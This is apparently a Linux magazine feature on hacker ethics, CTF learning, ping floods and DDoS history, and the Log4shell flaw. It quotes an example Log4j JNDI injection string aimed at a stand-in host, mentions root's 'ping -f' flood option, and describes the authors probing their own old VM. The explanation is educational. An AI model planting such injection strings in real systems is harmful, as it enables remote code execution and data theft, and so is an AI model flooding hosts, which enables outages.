Modern hacking, ethics and statistics
Read about the largest DDoS in history and how honing your hacking skills might help you prevent the next one…
Agerund and an infinitive walk in to the Linux kernel. They were hacking to learn. An awful adaptation of a (drinking to forget) joke, but a reasonable opener. An incredibly useful maxim from long ago hacker lore is “don’t learn to hack, hack to learn”. It’s worth taking some time to marinate on this message.
For example, if you search Google for “how to hack” or worse “how to hack gmail”, we can pretty much guarantee you won’t find any useful information. Indeed, you’ll probably find all sorts of spam and phishing links that we wouldn’t recommend touching, even with JavaScript turned off. This isn’t because search engines are producing increasingly bad search results, but because hackers and advertisers know the kinds of intellects who are searching for these terms. And unfortunately they know how to monetise them, too.
Yet there are plenty of good resources where you can learn network reconnaissance, penetration testing and even phishing techniques. Sites like https://tryhackme. com, for example, will teach you these skills with a view to learning how to defend against them. TryHackMe makes the learning process fun by gamifying tutorials, in some cases giving you VMs to download and intrude. There are lessons, labs and competitions that will help you learn everything from Metasploit to Maltego. A big part of hacker culture is Capture The Flag (CTF) challenges. You might remember this one from the playground, or later from first-person shooters such as Unreal Tournament. The traditional idea is that teams compete to try and capture the flags from opposing teams’ bases and return them to their own. But the hacker version just involves finding flags (sometimes just empty files called flag, sometimes more interesting items) hidden by whoever set the challenge.
Open the floodgates
We started with the ping of death, so let’s end with the idea of a ping flood. Instead of a single malformed packet, a huge number of legitimately sized ones are transmitted. The idea is to overwhelm the target machine by sending more pings than it can handle. Both the Ping of Death and ping flooding are part of the broad category known as Denial of Service (DoS) attacks.
On Linux some features of the ping command are only available when they’re run as root. One such example is the -f or flood option, which when used on its own sends echo requests as quickly as possible. In favourable circumstances (the attacker has significantly more bandwidth than the defender, and the defender has no DoS-preventing firewall), it’s possible for one machine to cripple another this way. It’s more common,
however, for an attacker to use several hosts to send the pings, making this a Distributed Denial of Service (DDoS) attack. Ping floods are defended against by most routers, as are SYN floods and other things. These are detectable by one’s garden variety packetfiltering stack.
The actual DDoS-ing is typically done by a botnet under the attackers control. Cybercrime groups may rent out sections of a hoard of zombie machines that they’ve curated, or they may use that hoard directly. So attacks have involved a huge amount of bandwidth. In 2016 DNS provider Dyn was taken offline (making many popular websites inaccessible) as result of the Mirai
malware, which mostly infects IoT devices using default credentials. The total bandwidth of this attack was estimated to be in the region of 1.2Tbps. Security commentators of the era lamented that the net had been crippled by a telnet scanner and 36 passwords. In November 2021, Microsoft revealed it had thwarted the largest DDoS attack in history, topping out at 3.47Tbps. That’s 3,000 times more data than gigabit LAN. A UDP reflection attack was to blame, but there are plenty of other types of DDoS attacks that are more sophisticated.
The Log4shell vulnerability took advantage of unsanitised input and at worst enabled remote code execution. All an attacker had to do was cause a carefully crafted message, which looked something like ${jndi:ldap://example.com/bad_file}
to be written to a log file. Like Bash, Log4j performs string substitution on expressions in curly brackets. In the right circumstances, the contents of /bad_file might be executed immediately on the server. Or the log may be processed on another server and /bad_file executed there later. If code execution is dodged, then an attacker can still cause the vulnerable machine to send data (such as environment variables or form contents) to their machine.
False sense of security
Here we’re abusing the Java Naming and Directory Interface’s (JNDI) ability to fetch resources via LDAP, but other protocols can be used to. As a result a number of related flaws were discovered soon after the first, and a number of incomplete mitigations were circulated initially, creating a very false sense of security. Once compromised, machines were enrolled in botnets, crippled with ransomware, or became unwitting cryptocurrency miners.
It’s interesting that the Dyn attack has been attributed (though not conclusively – all we really know is that in 2017 three individuals aged 20-21 entered guilty pleas relating to “significant cyber attacks”) to disgruntled Minecraft players, and so too was Log4j. Indeed, to exploit Log4j on a vulnerable Minecraft server, all you needed to do was post the code snippet above into the chat. From there it would be dutifully processed by Log4j and if various conditions are met the attacker would be able to execute code.
And there concludes our perennial hacker special. As usual we’ve barely scratched the surface of the subject matter, and indeed dealt with only a fraction of the fantastic selection of tooling within Parrot. But hopefully you’ve learned something. We certainly have. Many readers will remember with fondness the old Drupalbased Linuxformat.com site. Quite how this stayed up for so long, and more importantly how we managed to avoid invoicing for so long (13 years to be precise), is a puzzle for the ages. As we’re fans of digital history here, we have most of that site archived in a virtual machine. And since we’re talking about hacker toolkits today we figured we’d have a go at compromising said virtual machine. Nmap evinced that our venerable, vulnerable, virtual machine was running the following ancient software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 and Subversion (no version number detected).
But try as we might, none of our exploits worked. We used ZAP (the Zed Attack Proxy) from OWASP (the Open Web Application Security Project, https://owasp. org) to try and attack the old archive forms, but nothing. If you’re interested, ZAP works by setting up a person in the middle proxy that can manipulate requests because they’re sent to the web server under investigation, and inspect responses.
We also tried Metasploit, which would be a whole feature (or even a bookazine) in itself. But the ghost of our machine, it seems, was as resilient as its former self. Ideas, anyone? Oh and one more thing. We ask politely that you don’t try and pentest our new website, because you will fail and Future’s Operations Team will hunt you down.